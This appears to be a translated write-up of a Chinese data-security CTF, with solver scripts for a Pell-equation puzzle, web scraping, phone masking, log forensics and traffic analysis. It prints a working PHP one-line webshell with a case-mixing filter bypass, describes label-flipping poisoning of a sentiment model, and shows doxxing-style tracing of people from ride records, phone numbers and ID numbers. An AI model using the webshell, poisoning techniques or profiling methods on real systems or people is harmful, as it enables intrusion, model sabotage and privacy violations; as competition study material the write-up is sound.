Data Security
AS
import math

def solve_pell(D):
    """Find the fundamental solution of the Pell equation x^2 - D*y^2 = 1
    via the continued-fraction expansion of sqrt(D)."""
    sqrtD = math.isqrt(D)
    if sqrtD * sqrtD == D:
        return None  # D is a perfect square, no solution
    m, d, a = 0, 1, sqrtD
    # Convergents p/q of the continued fraction
    num1, num = 1, a
    den1, den = 0, 1
    while num * num - D * den * den != 1:
        m = d * a - m
        d = (D - m * m) // d
        a = (sqrtD + m) // d
        num, num1 = a * num + num1, num
        den, den1 = a * den + den1, den
    return (num, den)

def generate_solutions(D, base_sol):
    """Iterate the fundamental solution to ever larger solutions until
    the derived values satisfy the challenge condition."""
    x1, y1 = base_sol
    xn, yn = x1, y1
    while True:
        k, y = xn, yn
        n1 = (k - 1) // 2
        n2 = y
        # Both values must exceed 2^5279 (0x149F == 5279)
        threshold = 1 << 0x149F
        if n1 > threshold and n2 > threshold:
            return (n1, n2)
        # Advance to the next solution: (x1 + y1*sqrt(D)) * (xn + yn*sqrt(D))
        xn, yn = x1 * xn + D * y1 * yn, x1 * yn + y1 * xn

if __name__ == "__main__":
    D = 8 * 5279  # 42232
    base_sol = solve_pell(D)
    if base_sol:
        x_base, y_base = base_sol
        print(f"Fundamental solution: (k={x_base}, y={y_base})")
        # Generate a solution satisfying the condition
        n1, n2 = generate_solutions(D, base_sol)
        print("\nSolution satisfying the condition:")
        print(f"n1 = {n1}")
        print(f"n2 = {n2}")
    else:
        print("D is a perfect square; no solution")
ez_upload
Uploading files, we found that .phtml files are accepted,
but the file content is not allowed to contain the string "php"; this is bypassed with mixed case (example below).
We wrote a one-line webshell, connected with AntSword (蚁剑),
and found the key in the www directory.
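A minimal example of the payload shape (an assumption, since the exact shell used is not recorded): PHP's open tag is case-insensitive, so a mixed-case tag in a .phtml file slips past a filter that only rejects the lowercase string "php".

<?PHP @eval($_POST['cmd']); /* mixed-case open tag bypasses the lowercase "php" content filter */ ?>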
Model Security
Data Preprocessing
1
Scripts used
Website-scraping script
import requests
from bs4 import BeautifulSoup
import time
import random

def scrape_product_reviews(product_id, file):
    url = f"http://47.117.190.214:32879/index.php?controller=product&action=detail&id={product_id}"
    try:
        # Short random delay (0-0.2 s) to avoid getting blocked
        time.sleep(random.uniform(0, 0.2))
        response = requests.get(url)
        response.raise_for_status()
        soup = BeautifulSoup(response.text, 'html.parser')
        reviews = soup.find_all('div', class_='review-item')
        for review in reviews:
            # Default placeholder ("无" = none) for each field
            user_id = "无"
            username = "无"
            phone = "无"
            content = "无"
            # Extract reviewer info
            user_info = review.find('div', class_='reviewer-info')
            if user_info:
                user_id_tag = user_info.find('span', class_='user-id')
                if user_id_tag:
                    user_id = user_id_tag.text.split(':')[-1].strip()
                username_tag = user_info.find('span', class_='reviewer-name')
                if username_tag:
                    username = username_tag.text.split(':')[-1].strip()
                phone_tag = user_info.find('span', class_='reviewer-phone')
                if phone_tag:
                    phone = phone_tag.text.split(':')[-1].strip()
            # Extract the review text
            content_tag = review.find('div', class_='review-content')
            if content_tag:
                content = content_tag.text.strip()
            # Write one record; the Chinese field labels are kept verbatim
            # because the downstream scripts parse them
            file.write(
                f"用户ID: {user_id}\n"
                f"用户名: {username}\n"
                f"手机号: {phone}\n"
                f"评论文本: {content}\n"
                f"商品ID: {product_id}\n"
                f"\n{'=' * 30}\n\n"  # separator line
            )
    except Exception as e:
        print(f"Error scraping product {product_id}: {e}")

# Open the output file
with open('product_reviews.txt', 'w', encoding='utf-8') as file:
    # Write the file header
    file.write("商城用户评价数据\n")
    file.write(f"生成时间: {time.strftime('%Y-%m-%d %H:%M:%S')}\n\n")
    # Scrape products 1-500
    for product_id in range(1, 501):
        print(f"Scraping product ID: {product_id}")
        scrape_product_reviews(product_id, file)
print("Done! Data saved to product_reviews.txt")
Extract the phone number, username, and user ID from product_reviews.txt and hash them with MD5
import hashlib

def generate_md5(input_file, output_file):
    with open(input_file, 'r', encoding='utf-8') as f_in, \
         open(output_file, 'w', encoding='utf-8') as f_out:
        current_entry = {}
        for line in f_in:
            line = line.strip()
            # A separator line marks the end of one record
            if line.startswith('=' * 30):
                if all(key in current_entry for key in ['用户ID', '用户名', '手机号']):
                    # Concatenate ID + username + phone and hash it
                    raw_str = f"{current_entry['用户ID']}{current_entry['用户名']}{current_entry['手机号']}"
                    print(raw_str)
                    md5_hash = hashlib.md5(raw_str.encode('utf-8')).hexdigest()
                    # Write "user_id:md5" so the merge script below can match on user ID
                    f_out.write(f"{current_entry['用户ID']}:{md5_hash}\n")
                current_entry = {}
                continue
            # Parse "key: value" fields
            if ':' in line:
                key, value = line.split(':', 1)
                current_entry[key.strip()] = value.strip()

if __name__ == "__main__":
    generate_md5('product_reviews.txt', 'md5.txt')
    print("MD5 hashing done; results saved to md5.txt")
Extract each review and its user ID from product_reviews.txt
def extract_reviews(input_file, output_file):
    with open(input_file, 'r', encoding='utf-8') as f_in, \
         open(output_file, 'w', encoding='utf-8') as f_out:
        current_entry = {}
        for line in f_in:
            # Strip leading/trailing whitespace
            cleaned_line = line.strip()
            # Separator: a line of exactly 30 '=' characters
            if cleaned_line == '=' * 30:
                if current_entry.get('用户ID') and current_entry.get('评论文本'):
                    f_out.write(f"{current_entry['用户ID']}:{current_entry['评论文本']}\n")
                current_entry = {}
                continue
            # Parse the user-ID field
            if cleaned_line.startswith('用户ID:'):
                current_entry['用户ID'] = cleaned_line.split(':', 1)[1].strip()
            # Parse the review-text field
            if cleaned_line.startswith('评论文本:'):
                current_entry['评论文本'] = cleaned_line.split(':', 1)[1].strip()

if __name__ == "__main__":
    extract_reviews('product_reviews.txt', 'reviews.txt')
    print("Extraction done; results saved to reviews.txt")
The reviews were then handed to an AI, with manual checking, to label each user ID's review as positive or negative.
Finally a script automatically reads review2.txt and md5.txt and generates the CSV
import csv
import re

def load_review_data(file_path):
    """Load the review-label data ("user_id:label" per line)."""
    reviews = {}
    with open(file_path, 'r', encoding='utf-8') as f:
        for line_num, line in enumerate(f, 1):
            line = line.strip()
            if not line:
                continue
            # partition() splits on the first colon only
            user_id, sep, label = line.partition(':')
            if not sep:
                print(f"[warn] bad format on line {line_num}: {line}")
                continue
            user_id = user_id.strip()
            label = label.strip()
            # Labels must be 0 or 1
            if label not in ('0', '1'):
                print(f"[warn] invalid label on line {line_num}: {label}")
                continue
            reviews[user_id] = label
    return reviews

def load_md5_data(file_path):
    """Load the MD5 signature data ("user_id:md5" per line)."""
    md5_pattern = re.compile(r'^[a-f0-9]{32}$')
    signatures = {}
    with open(file_path, 'r', encoding='utf-8') as f:
        for line_num, line in enumerate(f, 1):
            line = line.strip()
            if not line:
                continue
            user_id, sep, md5 = line.partition(':')
            if not sep:
                print(f"[warn] bad format on line {line_num}: {line}")
                continue
            user_id = user_id.strip()
            md5 = md5.strip().lower()  # normalize MD5 to lowercase
            # Validate the MD5 format
            if not md5_pattern.match(md5):
                print(f"[warn] invalid MD5 on line {line_num}: {md5}")
                continue
            signatures[user_id] = md5
    return signatures

def generate_csv(reviews, signatures, output_file):
    """Write the final merged CSV."""
    matched = 0
    missing = []
    with open(output_file, 'w', encoding='utf-8', newline='') as f:
        writer = csv.writer(f)
        writer.writerow(['user_id', 'label', 'signature'])
        for user_id, label in reviews.items():
            if user_id in signatures:
                writer.writerow([user_id, label, signatures[user_id]])
                matched += 1
            else:
                missing.append(user_id)
    # Print statistics
    print(f"Matched records: {matched}")
    if missing:
        print(f"User IDs without an MD5 signature: {len(missing)}")
        print(f"Sample missing IDs: {', '.join(missing[:3])}...")

if __name__ == "__main__":
    # File paths
    REVIEW_FILE = "review2.txt"
    MD5_FILE = "md5.txt"
    OUTPUT_FILE = "result.csv"
    # Load the data
    print("Loading review data...")
    review_data = load_review_data(REVIEW_FILE)
    print(f"Valid review records: {len(review_data)}")
    print("\nLoading MD5 data...")
    md5_data = load_md5_data(MD5_FILE)
    print(f"Valid MD5 records: {len(md5_data)}")
    # Generate the CSV
    print("\nGenerating merged file...")
    generate_csv(review_data, md5_data, OUTPUT_FILE)
    print(f"\nResult saved to: {OUTPUT_FILE}")
2
Scripts used
Scrape each product's feature values with a crawler, match the data, and generate the table
import requests
import csv
import re
from bs4 import BeautifulSoup

def get_category_id(product_name):
    if "花卉" in product_name:
        return 23
    if "园艺" in product_name and "花卉" not in product_name:
        return 25
    # Keyword-to-category mapping (some keywords are only examples)
    mapping = [
        (1, ["手机", "oneplus", "iphone", "oppo", "vivo", "华为"]),
        (2, ["母婴"]),
        (3, ["家居"]),
        (4, ["书", "著作", "物种起源", "达尔文"]),
        (5, ["蔬菜"]),
        (6, ["厨房"]),
        (7, ["办公"]),
        (8, ["水果", "桑葚", "苹果", "香蕉", "橙子"]),
        (9, ["宠物"]),
        (10, ["运动"]),
        (11, ["热水器", "恒温"]),
        (12, ["彩妆"]),
        (13, ["保健品"]),
        (14, ["酒水"]),
        (15, ["玩具"]),
        (16, ["汽车"]),
        (17, ["床上"]),
        (18, ["洗发水", "洗护"]),
        (19, ["五金"]),
        (20, ["户外"]),
        (21, ["珠宝"]),
        (22, ["医疗"]),
        (24, ["游戏"]),
    ]
    name_lower = product_name.lower()
    for cid, keywords in mapping:
        for kw in keywords:
            if kw.lower() in name_lower:
                return cid
    # No keyword matched: return 0 for unknown category
    return 0

def parse_sales(sales_str):
    """Parse a sales string such as "月销量: 720件": extract the number
    and clamp negative values to 0."""
    match = re.search(r'月销量:\s*(-?\d+)', sales_str)
    if match:
        sales = int(match.group(1))
        return sales if sales > 0 else 0
    return 0

def get_review_count(product_detail_url):
    """Fetch the product detail page and count the review entries
    (assuming review items carry the class 'review-item').
    Returns 0 if the page cannot be fetched or has no reviews."""
    try:
        resp = requests.get(product_detail_url, timeout=5)
        if resp.status_code != 200:
            return 0
        detail_soup = BeautifulSoup(resp.text, 'html.parser')
        # Adjust the selector to the actual detail-page structure
        review_items = detail_soup.find_all(class_='review-item')
        return len(review_items)
    except Exception as e:
        print(f"Error fetching reviews from {product_detail_url}: {e}")
        return 0

def main():
    base_url = "http://47.117.190.214:32879/index.php?controller=home&action=index&page="
    products = []
    page = 1
    # Keep scraping pages until 500 products are collected or no pages remain
    while len(products) < 500:
        url = base_url + str(page)
        print("Scraping page:", page)
        try:
            resp = requests.get(url, timeout=10)
        except Exception as e:
            print(f"Failed to retrieve page {page}: {e}")
            break
        if resp.status_code != 200:
            print("Failed to retrieve page:", page)
            break
        soup = BeautifulSoup(resp.text, 'html.parser')
        product_cards = soup.find_all(class_="product-card")
        if not product_cards:
            print("No product cards found on page:", page)
            break
        for card in product_cards:
            try:
                product_id_text = card.find(class_="product-id").get_text(strip=True)
                # e.g. "商品ID: 500"
                product_id = int(re.search(r'商品ID:\s*(\d+)', product_id_text).group(1))
                product_name = card.find(class_="product-name").get_text(strip=True)
                sales_text = card.find(class_="product-sales").get_text(strip=True)
                sales = parse_sales(sales_text)
                # Detail-page link, used to count the reviews
                product_link = card.find("a", class_="product-link")["href"]
                reviews_number = get_review_count(product_link)
                category_id = get_category_id(product_name)
                products.append({
                    "product_id": product_id,
                    "sales": sales,
                    "category_id": category_id,
                    "reviews_number": reviews_number
                })
                if len(products) >= 500:
                    break
            except Exception as e:
                print(f"Error parsing product card: {e}")
                continue
        page += 1
    # Sort by product ID in ascending order
    products = sorted(products, key=lambda x: x["product_id"])
    # Save as a UTF-8 CSV file
    output_file = "submit_2.csv"
    with open(output_file, "w", newline="", encoding="utf-8") as f:
        writer = csv.DictWriter(f, fieldnames=["product_id", "sales", "category_id", "reviews_number"])
        writer.writeheader()
        for prod in products:
            writer.writerow(prod)
    print(f"Finished! {len(products)} products have been saved to {output_file}")

if __name__ == "__main__":
    main()
3
Reuse the crawler script from question 1, then work from the contents of product_reviews.txt:
extract the phone numbers, desensitize them, and save the result
import re

def process_phone(phone):
    """Mask a phone number, keeping the first 3 and last 4 digits."""
    if len(phone) != 11 or not phone.isdigit():
        return None
    return f"{phone[:3]}****{phone[-4:]}"

def extract_phones(input_file, output_file):
    with open(input_file, 'r', encoding='utf-8') as f_in, \
         open(output_file, 'w', encoding='utf-8') as f_out:
        # Patterns matching the record format written by the crawler
        id_pattern = re.compile(r'用户ID:\s*(\d+)')
        phone_pattern = re.compile(r'手机号:\s*(\d{11})')
        current_id = None
        current_phone = None
        for line in f_in:
            line = line.strip()
            # Match the user-ID line
            if id_match := id_pattern.search(line):
                current_id = id_match.group(1)
            # Match the phone-number line
            elif phone_match := phone_pattern.search(line):
                raw_phone = phone_match.group(1)
                if processed_phone := process_phone(raw_phone):
                    current_phone = processed_phone
            # Flush one record at each separator line
            if line.startswith('========'):
                if current_id and current_phone:
                    f_out.write(f"{current_id}:{current_phone}\n")
                # Reset the temporaries
                current_id = None
                current_phone = None

if __name__ == "__main__":
    extract_phones('product_reviews.txt', 'phone.txt')
    print("Phone extraction done; results saved to phone.txt")
Then generate the CSV directly; the User-Agent check is handled by manual input
import csv

def convert_to_csv(input_file, output_file):
    """Convert phone.txt into the required CSV format.
    :param input_file: input file name
    :param output_file: output file name
    """
    try:
        with open(input_file, 'r', encoding='utf-8') as f_in, \
             open(output_file, 'w', encoding='utf-8', newline='') as f_out:
            # Create the CSV writer
            writer = csv.writer(f_out)
            # Write the header row
            writer.writerow(['user_id', 'desensitization'])
            # Process the data lines
            for line_num, line in enumerate(f_in, 1):
                line = line.strip()
                if not line:
                    continue
                # Each line must be "user_id:masked_phone"
                if ':' not in line:
                    print(f"Line {line_num}: missing colon separator: {line}")
                    continue
                user_id, desensitization = line.split(':', 1)
                user_id = user_id.strip()
                desensitization = desensitization.strip()
                # Validate the fields
                if not user_id.isdigit():
                    print(f"Line {line_num}: non-numeric user ID: {user_id}")
                    continue
                if len(desensitization) != 11 or '****' not in desensitization:
                    print(f"Line {line_num}: bad masked format: {desensitization}")
                    continue
                # Write the CSV row
                writer.writerow([user_id, desensitization])
    except FileNotFoundError:
        print(f"Error: file {input_file} does not exist")
    except Exception as e:
        print(f"Unexpected error: {e}")

if __name__ == "__main__":
    # Configuration
    INPUT_FILE = "phone.txt"
    OUTPUT_FILE = "phone_data.csv"
    # Run the conversion
    convert_to_csv(INPUT_FILE, OUTPUT_FILE)
    print(f"Conversion done; result saved to {OUTPUT_FILE}")
Model Adversarial Poisoning
1
By analyzing the model and its vectorizer, we identified the keywords with the greatest influence on the two classification outcomes — 垃圾 ("garbage") and 不错 ("not bad") — wrote them into the table, and poisoned the data with them to sway the results (CSV data at the end). A sketch of how such tokens can be read off the model follows.
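A minimal sketch of this analysis, assuming the challenge shipped a scikit-learn-style vectorizer and linear classifier (the file names vectorizer.pkl and model.pkl are placeholders): the largest and smallest coefficients point at the tokens that push hardest toward each class.

import joblib
import numpy as np

# Placeholder artifact names; the challenge's actual files may differ
vectorizer = joblib.load("vectorizer.pkl")
model = joblib.load("model.pkl")

feature_names = np.array(vectorizer.get_feature_names_out())
weights = model.coef_[0]  # binary classifier: one weight per token

top_pos = feature_names[np.argsort(weights)[-10:]]  # strongest pull toward one class
top_neg = feature_names[np.argsort(weights)[:10]]   # strongest pull toward the other
print("Most positive tokens:", top_pos)
print("Most negative tokens:", top_neg)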
2
Generate at most 100 poisoned samples, each at most 20 characters long. The samples must attach negative labels to positive words and positive labels to negative words, so the script has to produce such data while respecting the character limit.
Build the positive and negative word lists. The positive list should contain common praise words such as 好, 推荐, and 满意; the negative list contains words such as 差, 失望, and 糟糕. The vocabulary needs to be diverse enough to cover as many contexts as possible and maximize the poisoning effect.
Sample generation: each sample consists of one or more keywords, optionally prefixed with an intensifier such as 非常 or 极其 for variety, while each sample stays within 20 characters. A function randomly combines keywords and intensifiers and checks the length.
Define the word lists and intensifiers, randomly generate samples, check length and deduplicate, then assign the flipped labels (CSV data at the end); a generator along these lines is sketched below.
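A minimal sketch of the generator described above, with placeholder word lists (the actual lists used were larger) and assumed CSV column names text/label and label polarity:

import csv
import random

POSITIVE = ["好", "推荐", "满意", "不错", "喜欢", "优秀"]  # praise words
NEGATIVE = ["差", "失望", "糟糕", "垃圾", "难用", "后悔"]  # negative words
MODIFIERS = ["", "非常", "极其", "真的", "特别"]           # intensifiers

def make_samples(words, flipped_label, n):
    # Enumerate all modifier+keyword combos within the 20-character limit,
    # deduplicate via the set, then sample up to n of them
    combos = {m + w for m in MODIFIERS for w in words if len(m + w) <= 20}
    picked = random.sample(sorted(combos), min(n, len(combos)))
    return [(text, flipped_label) for text in picked]

# Positive words get the negative label and vice versa; <= 100 rows in total
rows = make_samples(POSITIVE, 0, 50) + make_samples(NEGATIVE, 1, 50)
with open("poison.csv", "w", encoding="utf-8", newline="") as f:
    writer = csv.writer(f)
    writer.writerow(["text", "label"])  # assumed column names
    writer.writerows(rows)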
Data Analysis
Tracing and Forensics
1
Opened the image in R-Studio Portable, found that all files had been deleted, and recovered them all.
The important file contains hidden text.
2
Analyzed the memory dump with Volatility and found TrueCrypt encryption; dumped the relevant process memory, then decrypted the log volume and mounted it, obtaining two log files. The rough command sequence is sketched below.
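The exact commands were not recorded; with Volatility 2 the workflow is roughly the following (image name, profile, and PID are placeholders):

volatility -f mem.raw imageinfo                                   # identify the profile
volatility -f mem.raw --profile=Win7SP1x64 pslist                 # locate the TrueCrypt process
volatility -f mem.raw --profile=Win7SP1x64 truecryptsummary       # confirm TrueCrypt artifacts
volatility -f mem.raw --profile=Win7SP1x64 truecryptmaster        # recover the master key
volatility -f mem.raw --profile=Win7SP1x64 memdump -p <PID> -D out/   # dump process memory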
3
The log file turned out to record a boolean-based blind SQL injection; a successful guess returns a response of length 704. Use awk to extract all lines containing 704, then run
awk 'match($0, /select%20id_card%20from%20info%20limit%20([0-9]{1,3}),1\),([0-9]{1,3}),1\)\)=([0-9]{1,3})/, a) {print a[1], a[2], a[3]}' 1.txt | sort -k 1,2 -n | uniq | python 1.py
together with the script below to recover the ID-card numbers.
import sys

# Dynamically growing list of reconstructed strings
str_list = []
for line in sys.stdin:
    line = line.strip()
    if not line:
        continue
    try:
        # Parse the three numbers: row offset, character position, ASCII code
        str_pos, char_pos, ascii_code = map(int, line.split())
        list_idx = str_pos        # the LIMIT offset is already 0-based
        char_idx = char_pos - 1   # the substring position is 1-based
        # Decode the ASCII code
        char = chr(ascii_code)
        # Grow the list as needed
        while len(str_list) <= list_idx:
            str_list.append("")  # pad with empty strings
        # Grow the target string as needed
        target_str = list(str_list[list_idx])
        while len(target_str) <= char_idx:
            target_str.append(" ")  # pad with spaces
        # Place the decoded character
        target_str[char_idx] = char
        str_list[list_idx] = "".join(target_str)
    except Exception as e:
        print(f"Parse error: {line} -> {e}", file=sys.stderr)

# Print the result
print("\nFinal string list:")
for idx, s in enumerate(str_list):
    print(f"[String {idx+1}] {s}")
[String 1] 110101199001011234
[String 2] 310115198502021234
[String 3] 440305199503031234
[String 4] 500101200012121234
[String 5] 330106197708081234
[String 6] 210202198609091234
[String 7] 420103199912121234
[String 8] 510104199311111234
[String 9] 230107196504041234
[String 10] 320508200005051234
[String 11] 130104198707071234
[String 12] 410105199206061234
[String 13] 220203198808081234
[String 14] 610112200109091234
[String 15] 340104197612121234
[String 16] 370202199404041234
[String 17] 530102199810101234
[String 18] 450305198303031234
[String 19] 120105197411111234
[String 20] 350203200202021234
[String 21] 430104199707071234
[String 1] WangWei
[String 2] LiNa
[String 3] ZhangQiang
[String 4] ChenFang
[String 5] LiuTao
[String 6] ZhouMin
[String 7] ZhaoGang
[String 8] YangXue
[String 9] HuangLei
[String 10] XuLi
[String 11] SunHao
[String 12] ZhuLin
[String 13] MaChao
[String 14] HeJing
[String 15] GaoFei
[String 16] LinYan
[String 17] GuoYong
[String 18] LuoMin
[String 19] LiangJun
[String 20] SongJia
[String 21] XieFang
Sorting the ID numbers by the first letters of their owners' names gives the string below; MD5-hash it and submit:
500101200012121234340104197612121234530102199810101234610112200109091234230107196504041234120105197411111234310115198502021234370202199404041234330106197708081234450305198303031234220203198808081234350203200202021234130104198707071234110101199001011234430104199707071234320508200005051234510104199311111234440305199503031234420103199912121234210202198609091234410105199206061234
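A small sketch that reproduces the submitted string from the two lists above (a case-insensitive sort on the name reproduces the order shown):

import hashlib

# (name, id_card) pairs recovered above, in log order
names = ["WangWei", "LiNa", "ZhangQiang", "ChenFang", "LiuTao", "ZhouMin",
         "ZhaoGang", "YangXue", "HuangLei", "XuLi", "SunHao", "ZhuLin",
         "MaChao", "HeJing", "GaoFei", "LinYan", "GuoYong", "LuoMin",
         "LiangJun", "SongJia", "XieFang"]
id_cards = ["110101199001011234", "310115198502021234", "440305199503031234",
            "500101200012121234", "330106197708081234", "210202198609091234",
            "420103199912121234", "510104199311111234", "230107196504041234",
            "320508200005051234", "130104198707071234", "410105199206061234",
            "220203198808081234", "610112200109091234", "340104197612121234",
            "370202199404041234", "530102199810101234", "450305198303031234",
            "120105197411111234", "350203200202021234", "430104199707071234"]

# Sort by name (case-insensitive), concatenate the IDs, and hash
pairs = sorted(zip(names, id_cards), key=lambda p: p[0].lower())
concat = "".join(idc for _, idc in pairs)
print(concat)
print(hashlib.md5(concat.encode()).hexdigest())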
Data Social Engineering
1
Viewed the DiDi ride records in Navicat to get latitude/longitude pairs, then looked the coordinates up to find the corresponding residential compound; the company name was found in question 3
2
See question 3
3
Obtained the phone number together with the company name and ID-card number
4
See question 3
5
The phone number 13891889377 was obtained earlier.
Searched for it in the car photos: imported them all into OCR and Ctrl+F'd the combined results for the number, which located it (a batch-OCR sketch follows).
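A minimal sketch of the batch OCR, assuming pytesseract and a car_images/ directory (both placeholders for whatever tool and path were actually used):

import glob
import pytesseract
from PIL import Image

TARGET = "13891889377"
for path in glob.glob("car_images/*.jpg"):
    # OCR each photo and search the text for the known phone number
    text = pytesseract.image_to_string(Image.open(path))
    if TARGET in text:
        print("Found in:", path)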
Data Attack and Defense
1
Exported the HTTP streams from the pcapng capture, found a blind SQL injection, and worked out the flag by hand
2
Filtered the POST-to-upload traffic in Wireshark and found two matching packets; analysis showed the uploaded file is named 2.abc. A display filter of the shape below works.
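The exact filter used is not recorded; something like this Wireshark display filter matches POST requests to an upload endpoint (the URI substring is an assumption):

http.request.method == "POST" && http.request.uri contains "upload"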
3
Script to count how often each name appears and convert the log automatically
import re
import json
from collections import defaultdict

def process_log(log_file, output_file):
    info_dict = defaultdict(lambda: {'phone': '', 'count': 0})
    with open(log_file, 'r', encoding='utf-8') as f:
        content = f.read()
    # Records are separated by lines of five or more '='
    blocks = re.split(r'={5,}\n', content)
    for block in blocks:
        block = block.strip()
        if not block:
            continue
        lines = block.split('\n')
        # Only HTTP blocks are of interest
        if not lines[0].startswith('HTTP/'):
            continue
        try:
            header_end = lines.index('')  # blank line ends the headers
        except ValueError:
            continue
        body = '\n'.join(lines[header_end+1:])
        try:
            data = json.loads(body)
            name = data.get('name', '')
            phone = data.get('phone', '')
            if name and phone:
                # Remember the first phone seen per name and count occurrences
                if info_dict[name]['count'] == 0:
                    info_dict[name]['phone'] = phone
                    info_dict[name]['count'] = 1
                else:
                    info_dict[name]['count'] += 1
        except json.JSONDecodeError:
            continue
    with open(output_file, 'w', encoding='utf-8') as f:
        for name in info_dict:
            if info_dict[name]['count'] > 0:
                f.write(f"{name} {info_dict[name]['phone']} {info_dict[name]['count']}\n")

if __name__ == '__main__':
    process_log('http.log', '1.txt')
Duplicate names were found; manual filtering gave the final answer:
王二蛋,15100266408,1053;石建,18623146812,1047;李二娃,13823137848,1037;